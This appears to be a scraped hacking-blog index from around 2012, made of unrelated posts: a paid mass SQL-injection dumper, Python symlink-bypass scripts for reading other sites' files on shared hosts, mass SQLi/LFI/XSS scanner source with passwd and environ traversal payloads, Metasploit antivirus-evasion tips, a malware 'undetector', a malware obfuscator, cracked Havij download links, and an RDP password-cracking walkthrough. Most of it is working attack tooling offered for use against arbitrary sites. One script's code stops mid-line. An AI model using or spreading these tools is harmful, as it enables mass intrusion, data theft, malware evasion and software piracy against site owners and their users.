1 MySQLi Dumper | SQLi Injection Tool

MySQLi Dumper is an advanced automated SQL Injection tool dedicated to SQL injection attacks on MySQL and MS SQL.
It is designed to be automated to find and exploit web security vulnerabilities in mass.
It Is robust, works in the background threads and is super faster.

The power of MySQLi Dumper that makes it different from similar tools:

1. -Suports Multi. Online search engine (to find the trajects);
2. -Automated exploiting and analizing from a URL list, with a greats success rate;
3. -Automated search for columns names from a URL list (search for columns name 'where like %value%', useful to find eg. mails);
4. -Dumper suport dumping data with multi-threading (databases/tables/columns/fetching data);
5. -Dumper can dump large data, with greats control of delay per request (multi-threading);
6. -Easy switch vulnerabilities to vulnerabilities;
7. -You can see everthing that is load by HTTP request (HTTP Debbuger)

Some features:

1. -Online mult. search engine;
2. -Suport MySQL Union, MySQL Error, MS SQL Union, MS SQL Error Integer/String;
3. -Automated Exploiting;
4. -Automated Analizing;
5. -Trash System (you never exploit the same URL);
6. -Database to collect all vulnerabilities (with option to search for data in mass);
7. -Customized exploiter and analizer;
8. -GeoIP database;
9. -Small browser you can use to Union Count, view source code and HTTP headers;
10. -Back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running custom SQL statements, suport save/load sessions to XML file;
11. -Bruter forcing for MySQL <= 4.x
12. -File dumper for MySQL;
13. -File dumper Scanner for MySQL;
14. -Blind dumper for MySQL;
15. -WAF bypass method;
16. -Suport single proxy or proxies list (random/by order).
17. -Hash online crack;
18. -Admin login finder;
19. -Multi-Threading;
20. -User friendly GUI;

Sreen Shots

For using this tool you should know a little about SQL Injections.
Price 60€ / 74 USD Full version.
Full source code 1000€ / 1227 USD
Accepted payments
- libertyreserve.com
- moneybookers.com (trusted users)
- paypal.com (maybe..)
Dependencies: .NET Framework v.4
Demo Version available (older version only)!
Download: http://www.mediafire.com/?wberio939vwh1ez
Demo Limitations

Max. URL per Search 500
Get links by ReverseIP DISABLED
Max. Trash 5000 URLs
SQL Injection Obfuscate - Bypass Functions and Keywords Filtering DISABLED
Exploiter Max. Threads 20
Analizer Max. Threads 3
Network Credential DISABLED
Proxy DISABLED
ReverseIP DISABLED
Blinder are disabled in DEMO EDITION, you can check the Version() only for a demo :)
Load_File() scanner DISABLED

if you bought the v. 4.x
Email me for free update!
Contact: mysqlidumper [ at ] gmail [ dot ] com

1 Server Bypass via Symlink - Jumping in server Part 2

Let's go with next method of symlink server bypassing , like u see and into before post now i will explain a new trick with an other tool.
http://www.flashcrew.in/2012/05/server-bypass-via-symlink-jumping-in.html

-------------------------
Here we will talk about an other tool who use python permission to read other folders/ files in same server.
Tool called xplor.py and here it's the source

 #!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os

def copyfile(source, dest, buffer_size=1024*1024):
    if not hasattr(source, 'read'):
        source = open(source, 'rb')
    if not hasattr(dest, 'write'):
        dest = open(dest, 'wb')
    while 1:
        copy_buffer = source.read(buffer_size)
        if copy_buffer:
            dest.write(copy_buffer)
        else:
            break
    source.close()
    dest.close()

if __name__=="__main__":
    if not len(sys.argv) == 3 and not len(sys.argv) == 2:
        sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
        sys.exit(1)
   
    target = sys.argv[1].replace("\\","/")
    if os.path.isdir(target):
        if not target.endswith("/"):
            target = target + "/"
        dir = os.listdir(target)
        for d in dir:
            fs = ""
            if os.path.isdir(target + d):
                fs = "[ DIR ]"
            elif os.path.isfile(target + d):
                fs = os.path.getsize(target + d)
                fs = str(fs)
               
            sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
    elif os.path.isfile(target):
        if len(sys.argv) == 3:
            copyfile(target, sys.argv[2])
        else:
            f = open(target, "rb")
            try:
                byte = f.read(1024)
                sys.stdout.write(byte)
                sys.stdout.flush()
                while byte != "":
                    byte = f.read(1024)
                    sys.stdout.write(byte)
                    sys.stdout.flush()
            finally:
                f.close()
    else:
        sys.stdout.write("Can't found file or folder : " + target)

http://pastebin.com/WqmCE2sJ

testing the script python xplor.py

User the tool to view folders where not have any permission to read inside

python xplor.py /var/www/index.php

View the files in no access folder .
python xplor.py /var/www/index.php

copy/ save ur file
python xplor.py /var/www/indro/ketek.jpg ketek.jpg


And yeah file it's here


Yeahh fucking access it's granted 


Some thing u can do with those other scripts in perl 
webs.pl
and
xplor.pl


enjoy it :)

4 Server Bypass via Symlink - Jumping in server Part 1

As we all know, symlinking it's on of greates methods for bypassing server security, mean to read files of other site in same shared host.
For getting success with this tutorial are required the following things:

• Python Installed on Server
• b374k.php shell
• And some scripts u will see below.

This idea have start from devilzc0de geeks and let me explain how it work.


here we are in folder /var/www/dono and trying to go into /www/

no permissions to go into /www .
before we got tired by trying the commands u must check if if python it's installed with command :

python -h

Now take this python script and name it as webs.py , It's a little python script who will open a new port on server SimpleHTTPServer ( python ) module. Default port from script it's 13123 .

#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os

port = 13123
if __name__=='__main__':
        os.chdir('/')
        Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

        httpd = SocketServer.TCPServer(("", port), Handler)

        print("Now open this server on webbrowser at port : " + str(port))
        print("example: http://maho.com:" + str(port))
        httpd.serve_forever()

http://pastebin.com/PddvszKC 

 

Next u wil need to run the webs.py script by following command

python webs.py

 open the site with port 13123
site.com:13123

And enjoy the symilinking, in next post i will show u how to do this in another way :)

2 Carbylamine - A PHP Script Encoder to 'Obfuscate/Encode' PHP Files

Carbylamine PHP Encoder is a PHP Encoder to 'Obfuscate/Encode' PHP File, Faster way to encode your malwares offline.

How to use:

carbylamine.php

Download carbylamine

Home project it's here

 

3 sqliChecker.py v.0.1

sqliChecker it's a mass list sqli vulnerabilty checker who detect vuln sites from a text file in multiple database types like Mysql, Mssql, Msaccess, Oracle. Automaticly remove duplicated sites.
Simple script and easy to use.
python sqliChecker.py vulnlistfile.txt

      

#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname        : sqliChecker.py
# Coder           : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version         : 0.1
# Greetz for rsauron and low1z, great python coders
# greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne, tek0t and all members of ex darkc0de.com, ljuska.org 
# 

import os, sys, subprocess, socket, urllib2, re, time

try:
 set
except NameError:
 from sets import Set as set
 
def timer():
 sec = time.time()
 return sec


def logo():
 print "\n|---------------------------------------------------------------|"
        print "| b4ltazar[@]gmail[dot]com                                      |"
        print "|   05/2012     sqliChecker.py v.0.1                            |"
        print "| b4ltazar.wordpress.com     &      ljuska.org                  |"
        print "|                                                               |"
        print "|---------------------------------------------------------------|\n"
  
 
if sys.platform == 'linux' or sys.platform == 'linux2':
  subprocess.call("clear", shell=True)
  logo()
else:
  subprocess.call("cls", shell=True)
  logo()

timeout = 10
socket.setdefaulttimeout(timeout)
log = "sqlivuln.txt"
logfile = open(log, "a")
urls = []
vuln = []

sqlerrors = {'MySQL': 'error in your SQL syntax',
             'MiscError': 'mysql_fetch',
             'MiscError2': 'num_rows',
             'Oracle': 'ORA-01756',
             'JDBC_CFM': 'Error Executing Database Query',
             'JDBC_CFM2': 'SQLServer JDBC Driver',
             'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
             'MSSQL_Uqm': 'Unclosed quotation mark',
             'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
             'MS-Access_JETdb': 'Microsoft JET Database',
             'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
             'Server Error' : 'Server Error',
             'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
             'Invalid Querystring' : 'Invalid Querystring',
             'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
             'VBScript Runtime' : 'VBScript Runtime',
             'ADODB.Field' : 'ADODB.Field',
             'BOF or EOF' : 'BOF or EOF',
             'ADODB.Command' : 'ADODB.Command',
             'JET Database' : 'JET Database',
             'mysql_fetch_array()' : 'mysql_fetch_array()',
             'Syntax error' : 'Syntax error',
             'mysql_numrows()' : 'mysql_numrows()',
             'GetArray()' : 'GetArray()',
             'FetchRow()' : 'FetchRow()',
             'Input string was not in a correct format' : 'Input string was not in a correct format'}
  
   

if len(sys.argv) != 2:
 print "[+] Usage: python sqliChecker.py "
 print "[+] Please visit ljuska.org & b4ltazar.wordpress.com"
 print "[!] Exiting, thanks for using script"
 sys.exit(1)
    
checklist = sys.argv[1]
starttimer = timer()

try:
  check = open(checklist, "r")
  checkline = check.readlines()
  print "[!] You have",len(checkline),"links to check\n"
except(IOError):
  print "[-] Error, check your path or file name!"
  print "[+] Please visit ljuska.org & b4ltazar.wordpress.com"
  print "[!] Exiting, thanks for using script"
  sys.exit(1)
  
for url in checkline:
 url = url.replace("\n", "")
 url = url.rsplit('=', 1)[0]+"="
 url = url+"'"
 urls.append(url)
 

def classicINJ(url):
 num = 1
 for url in urls:
  try:
   source = urllib2.urlopen(url).read()
   for type,eMSG in sqlerrors.items():
    if re.search(eMSG, source):
     print num,"/",len(urls), "w00t!,w00t!:", url, "Error:", type, " ---> SQL Injection Found"
     vuln.append(url)
    else:
     pass
  except:
   pass
  
  num += 1

 

if __name__ == "__main__":
 classicINJ(url)  
 print "\n[!] There is %s vulnerable sites to SQL Injection" % len(vuln)
 vulnerable = list(set(vuln))
 print "[+] Without duplicates we have %s vulnerable sites to SQL Injection" % len(vulnerable)
 for v in vulnerable:
  logfile.write("\n"+v)
  
 endtimer = timer()
 print "\n[+] Time used for checking :", int(((endtimer-starttimer) / 60)), "minutes"
 print "[+] Average time per link is :", int(((endtimer-starttimer) / float(len(checkline)))), "seconds"
 print "[+] Please visit ljuska.org & b4ltazar.wordpress.com"

or direct link from pastebin http://pastebin.com/raw.php?i=jA7wrWw1

 thanks to baltazar for this script

0 Using Metasploit Templates to Bypass AV

 

 

Metasploit Templates

Metasploit creates executable files by encoding a payload and then inserting the payload into a template executable file. The templates are in the data/templates folder. Metasploit includes templates for Windows, Mac, and Linux, templates for x86, x86_64, and ARM, and a template for Windows services. If you look in the data/templates/src folder you will find the source files for each of the templates.

Modifying the Templates

Each source file declares a variable to hold the payload and assigns it the value of “PAYLOAD:”. The payload variable is 4096 bytes in some cases and 8192 bytes in others. Metasploit uses lib/msf/util/exe.rb to insert your payload by replacing the value “PAYLOAD:” with your encoded payload. You can use a custom template as long as it defines a variable of the right size and assigns it the value of “PAYLOAD:”. For the service template you can also define a variable and assign it the value “SERVICENAME”. Looking at the service.c template you can see the variable definitions:

#define PAYLOAD_SIZE 8192
char cServiceName[32] = "SERVICENAME";
char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";

Using a Custom Template

If executables built with the default template are getting caught by your AV then you will need to modify the source file, compile it, and then use the new executable as your template. If you are using msfencode it looks like this:

msfencode -t exe -x /path/to/template/template.exe

If you are using the psexec module then you can set the advanced options EXE::Template and EXE::Path.

Bypassing Antivirus

There is no tried and true technique for bypassing antivirus. You may find your AV product can be bypassed with simple modifications to the templates or you may find that it doesn’t matter how you modify the template because the AV is picking up on the payload. This is when your encoding becomes important.
Here are a couple of things to keep in mind.

1. People don’t like to talk about how they bypass AV because the AV companies will develop a signature.
2. Don’t submit your AV bypass to VirusTotal or similar services because the AV companies use these services to develop new signatures.
3. Setup a virtual machine with the AV you want to bypass, update it to the latest signatures then disconnect it from the network.

UPDATE: I have rewritten this article and put it on the Metasploit documentation wiki you can find it here.

1 Offset x Offset Undetector - A Virus/Malware/Spyware/Trojan Undetector Tool

The aim of this tool is to find viral signature for your legal programs
like other programs that do this job you have to scan produced file and find the smallest range
features:
start/end offset (hex/decimal) : Header/Sections+EOF/ALL/User values
Random and Not filling
Unknown size method (beta) : (sign begin/sign end/ud byte)
scan with a command line AV
show undetected range(s) (double click to select it)
PE header compare
Edit/move EP (move by (Di)asm or hex copy)
like any program this may contain bug(s), so don't blame me for any problem due to bugs, to this program, or to the way you use it

The main aim is to Undetect the Trojans/malware files. You need to have advanced knowledge about this else you may not able to use this tool

Main program fully written on ASM (MASM32), thanks to Oleh Yuschuck for OllyDisasm
Offset x Offset Undetector - A Virus/Malware/Spyware/Trojan Undetector Tool
Download Here
www.mediafire.com/?ib623249s19bt7b

7 Dark D0rk3r 0.7

Dark D0rk3r is a python script that performs dork searching and searches for local file inclusion and SQL injection errors.

#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname        : darkd0rk3r.py
# Coder           : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version         : 0.7
# Greetz for rsauron and low1z, great python coders
# greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne, tek0t and all members of ex darkc0de.com, ljuska.org 
# 

import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess
from random import choice

# Colours
W  = "\033[0m";  
R  = "\033[31m"; 
G  = "\033[32m"; 
O  = "\033[33m"; 
B  = "\033[34m";


# Banner
def logo():
	print R+"\n|---------------------------------------------------------------|"
        print "| b4ltazar[@]gmail[dot]com                                      |"
        print "|   02/2012     darkd0rk3r.py  v.0.7                            |"
        print "|    b4ltazar.wordpress.com    &   ljuska.org                   |"
        print "|                                                               |"
        print "|---------------------------------------------------------------|\n"
	print W

if sys.platform == 'linux' or sys.platform == 'linux2':
  subprocess.call("clear", shell=True)
  logo()
  
else:
  subprocess.call("cls", shell=True)
  logo()
  
log = "darkd0rk3r-sqli.txt"
logfile = open(log, "a")
lfi_log = "darkd0rk3r-lfi.txt"
lfi_log_file = open(lfi_log, "a")
rce_log = "darkd0rk3r-rce.txt"
rce_log_file = open(rce_log, "a")
xss_log = "darkd0rk3r-xss.txt"
xss_log_file = open(xss_log, "a")

threads = []
finallist = []
vuln = []
timeout = 300
socket.setdefaulttimeout(timeout)



           
lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]

xsses = ["


XSS by baltazar
","%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E"]

sqlerrors = {'MySQL': 'error in your SQL syntax',
             'MiscError': 'mysql_fetch',
             'MiscError2': 'num_rows',
             'Oracle': 'ORA-01756',
             'JDBC_CFM': 'Error Executing Database Query',
             'JDBC_CFM2': 'SQLServer JDBC Driver',
             'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
             'MSSQL_Uqm': 'Unclosed quotation mark',
             'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
             'MS-Access_JETdb': 'Microsoft JET Database',
             'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
             'Server Error' : 'Server Error',
             'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
             'Invalid Querystring' : 'Invalid Querystring',
             'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
             'VBScript Runtime' : 'VBScript Runtime',
             'ADODB.Field' : 'ADODB.Field',
             'BOF or EOF' : 'BOF or EOF',
             'ADODB.Command' : 'ADODB.Command',
             'JET Database' : 'JET Database',
             'mysql_fetch_array()' : 'mysql_fetch_array()',
             'Syntax error' : 'Syntax error',
             'mysql_numrows()' : 'mysql_numrows()',
             'GetArray()' : 'GetArray()',
             'FetchRow()' : 'FetchRow()',
             'Input string was not in a correct format' : 'Input string was not in a correct format',
             'Not found' : 'Not found'}
             

header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
          'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
          'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
	  'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
	  'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
	  'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
	  'Microsoft Internet Explorer/4.0b1 (Windows 95)',
	  'Opera/8.00 (Windows NT 5.1; U; en)',
	  'amaya/9.51 libwww/5.4.0',
	  'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
	  'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
	  'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
	  'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
	  'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
	  'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
	  
	  
domains = {'All domains':['ac', 'ad', 'ae', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao',
           'aq', 'ar', 'as', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb',
           'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn', 'bo',
           'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cc', 'cd',
           'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr',
           'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do',
           'dz', 'ec', 'ee', 'eg', 'eh', 'er', 'es', 'et', 'eu', 'fi',
           'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf',
           'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'gs',
           'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu',
           'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it',
           'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn',
           'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk',
           'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me',
           'mg', 'mh', 'mk', 'ml', 'mm', 'mn', 'mo', 'mp', 'mq', 'mr',
           'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'nc',
           'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz',
           'om', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn',
           'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru',
           'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj',
           'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy',
           'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm',
           'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug',
           'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi',
           'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'za', 'zm', 'zw', 'com',
           'net', 'org','biz', 'gov', 'mil', 'edu', 'info', 'int', 'tel',
           'name', 'aero', 'asia', 'cat', 'coop', 'jobs', 'mobi', 'museum',
           'pro', 'travel'],'Balcan':['al', 'bg', 'ro', 'gr', 'rs', 'hr',
           'tr', 'ba', 'mk', 'mv', 'me'],'TLD':['xxx','edu', 'gov', 'mil',
           'biz', 'cat', 'com', 'int','net', 'org', 'pro', 'tel', 'aero', 'asia',
           'coop', 'info', 'jobs', 'mobi', 'name', 'museum', 'travel']}
           
  
stecnt = 0
for k,v in domains.items():
  stecnt += 1
  print str(stecnt)+" - "+k
sitekey = raw_input("\nChoose your target   : ")
sitearray = domains[domains.keys()[int(sitekey)-1]]
    

inurl = raw_input('\nEnter your dork      : ')
numthreads = raw_input('Enter no. of threads : ')
maxc = raw_input('Enter no. of pages   : ')
print "\nNumber of SQL errors :",len(sqlerrors)
print "Number of LFI paths  :",len(lfis)
print "Number of XSS cheats :",len(xsses)
print "Number of headers    :",len(header)
print "Number of threads    :",numthreads
print "Number of pages      :",maxc
print "Timeout in seconds   :",timeout
print ""




def search(inurl, maxc):
  urls = []
  for site in sitearray:
    page = 0
    try:
      while page < int(maxc):
	jar = cookielib.FileCookieJar("cookies")
	query = inurl+"+site:"+site
	results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(page)+'&src=hmp'
	request_web =urllib2.Request(results_web)
	agent = random.choice(header)
	request_web.add_header('User-Agent', agent)
	opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
	text = opener_web.open(request_web).read()
	stringreg = re.compile('(?<=href=")(.*?)(?=")')
        names = stringreg.findall(text)
        page += 1
        for name in names:
	  if name not in urls:
	    if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
	      pass
	    elif re.search("google",name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack",name) or re.search("phpbuilder",name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name) or re.search("facebook", name) or re.search("twitter", name):
	      pass
	    else:
	      urls.append(name)
	percent = int((1.0*page/int(maxc))*100)
	urls_len = len(urls)
	sys.stdout.write("\rSite: %s | Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site,repr(urls_len),repr(percent),repr(page)))
	sys.stdout.flush()
    except(KeyboardInterrupt):
      pass
  tmplist = []
  print "\n\n[+] URLS (unsorted): ",len(urls)
  for url in urls:
    try:
      host = url.split("/",3)
      domain = host[2]
      if domain not in tmplist and "=" in url:
	finallist.append(url)
	tmplist.append(domain)
	
    except:
      pass
  print "[+] URLS (sorted)  : ",len(finallist)
  return finallist

  
class injThread(threading.Thread):
        def __init__(self,hosts):
                self.hosts=hosts
                self.fcount = 0
                self.check = True
                threading.Thread.__init__(self)

        def run (self):
                urls = list(self.hosts)
                for url in urls:
                        try:
                                if self.check == True:
                                        ClassicINJ(url)
                                else:
                                        break
                        except(KeyboardInterrupt,ValueError):
                                pass
                self.fcount+=1

        def stop(self):
                self.check = False
                
class lfiThread(threading.Thread):
        def __init__(self,hosts):
                self.hosts=hosts
                self.fcount = 0
                self.check = True
                threading.Thread.__init__(self)

        def run (self):
                urls = list(self.hosts)
                for url in urls:
                        try:
                                if self.check == True:
                                        ClassicLFI(url)
                                else:
                                        break
                        except(KeyboardInterrupt,ValueError):
                                pass
                self.fcount+=1

        def stop(self):
                self.check = False
                
class xssThread(threading.Thread):
        def __init__(self,hosts):
                self.hosts=hosts
                self.fcount = 0
                self.check = True
                threading.Thread.__init__(self)

        def run (self):
                urls = list(self.hosts)
                for url in urls:
                        try:
                                if self.check == True:
                                        ClassicXSS(url)
                                else:
                                        break
                        except(KeyboardInterrupt,ValueError):
                                pass
                self.fcount+=1

        def stop(self):
                self.check = False
                
                
def ClassicINJ(url):
        EXT = "'"
        host = url+EXT
        try:
                source = urllib2.urlopen(host).read()
                for type,eMSG in sqlerrors.items():
                        if re.search(eMSG, source):
                                print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found"
				logfile.write("\n"+host)
				vuln.append(host)
				
				
                        else:
                                pass
        except:
                pass


def ClassicLFI(url):
  lfiurl = url.rsplit('=', 1)[0]
  if lfiurl[-1] != "=":
    lfiurl = lfiurl + "="
  for lfi in lfis:
    try:
      check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read()
      if re.findall("root:x", check):
	print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found"
	lfi_log_file.write("\n"+lfiurl+lfi)
	vuln.append(lfiurl+lfi)
	target = lfiurl+lfi
	target = target.replace("/etc/passwd","/proc/self/environ")
	header = ""
        try:
	  request_web = urllib2.Request(target)
	  request_web.add_header('User-Agent', header)
	  text = urllib2.urlopen(request_web)
	  text = text.read()
	  if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):
	    print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found"
	    rce_log_file.write("\n",target)
	    vuln.append(target)
        except:
	  pass
	
    except:
      pass

def ClassicXSS(url):
  for xss in xsses:
    try:
      source = urllib2.urlopen(url+xss.replace("\n","")).read()
      if re.findall("XSS by baltazar", source):
	print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)"
	xss_log_file.write("\n"+url+xss)
	vuln.append(url+xss)
    except:
      pass

def injtest():
  print B+"\n[+] Preparing for SQLi scanning ..."
  print "[+] Can take a while ..."
  print "[!] Working ...\n"
  i = len(usearch) / int(numthreads)
  m = len(usearch) % int(numthreads)
  z = 0
  if len(threads) <= numthreads:
    for x in range(0, int(numthreads)):
      sliced = usearch[x*i:(x+1)*i]
      if (z

 Download

0 GooDork – Google Dorking Tool

GooDork is a simple python script designed to allow you to leverage the power of Google Dorking straight from the comfort of your command line. 

GooDork offers powerful use of Google’s search directives, by analyzing results from searches using regular expressions that you supply. So basically the purpose of GooDork is to combined Dorking with Regular Expressions.

GooDork allows you to apply regular expressions to any and all of the follow attributes of web applications:

• URL
• Displayable Text
• Anchors
• Many more options will shortly be made available

Dependencies

GooDork uses the following python packages, please make sure all of them are available

• python beautifulsoup4
• python-httplib
• python-urllib
• python-urlparse

If you are using Python 2.6 you’ll most likely have all of these (except BeautifulSoup).

Installing:

The only installation you need do is to download the entire script package, and make sure the dependencies — listed above — are installed on your machine.

You can download GooDork here (using git):

git clone https://github.com/k3170makan/GooDork

Or read more here.

0 Shutdown PC from cell phone ( thunderbird email )

Here u will learn a nice tric to shutdown your Windows PC with a text message.
With an add-on and a few tweaks, it is possible configure this, with a portable copy of Mozilla Thunderbird.
This should take < 10 minutes to set up and configure.

Step 1 - Get thunderbird portable

Download a copy of portable thunderbird:
http://portableapps.com/apps/internet/thunderbird_portable
and extract it by running the exe.

Step 2 - Setup thunderbird & install add-on

First of all, set up an email account. I created a gmail account just for this project. Go through thunderbird's setup process and make sure your email account is configured properly. You'll probably need to login to your account and enable POP/IMAP settings.

Now that you have a portable, working copy of mozilla thunderbird, download this add-on:
https://addons.mozilla.org/en-US/thunderbird/addon/2610
This is what makes it all work.

To install this into the thunderbird portable folder, open ThunderbirdPortable, and go to Tools -> Add-ons and click install. Direct thunderbird to the .xpi file you downloaded and it will install the add-on.

Restart thunderbird to proceed.

Continue reading to original post on Hak5 Forum

16 Havij 1.52 Pro ~ SQL Injection Tool

Here it's the last cracked app from Exidous, Havij 1.52 Pro . Now will work with more and more sites ..
Register it on name: Cracked@By.Exidous

Links Updatet, Now Work 100% :)
Download
http://www.sendspace.com/file/m4hqia
Lic file
http://www.sendspace.com/file/r5ifpoOCX Files
http://www.sendspace.com/file/gwl2cd

Thanks to Exidous :)

0 RDP Scanning & Cracking

DISCLAIMER
All information provided are for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). Tools and techniques demonstrated may be potential damaging if used inappropriately. All characters and data written on this post are fictitious.

The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such SSH and VNC are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we already tried all the available remote attacks with no luck. We tried also to ARP poisoning the LAN looking to get user names and passwords, without succeeding. From a previus nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate further this possibility. First of all we need some valid usernames in order to guess only the passwords rather than both. We found the names of the IT guys on varius social networking websites. Those are the key IT staff:

jessie tagle
julio feagins
hugh duchene
darmella martis
lakisha mcquain
ted restrepo
kelly missildine
Didn’t take long to create valid usernames following the common standard of using the first letter of the name and the entire surname.
jtagle
jfeagins
hduchene
dmartis
lmcquain
trestrepo
kmissildine
Software required:
Linux machine, preferably Ubuntu.
nmap and terminal server client, sudo apt-get install tsclient nmap  build-essential checkinstall libssl-dev libssh-dev
About Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more. Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet .http://nmap.org/ncrack/

Installation
wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
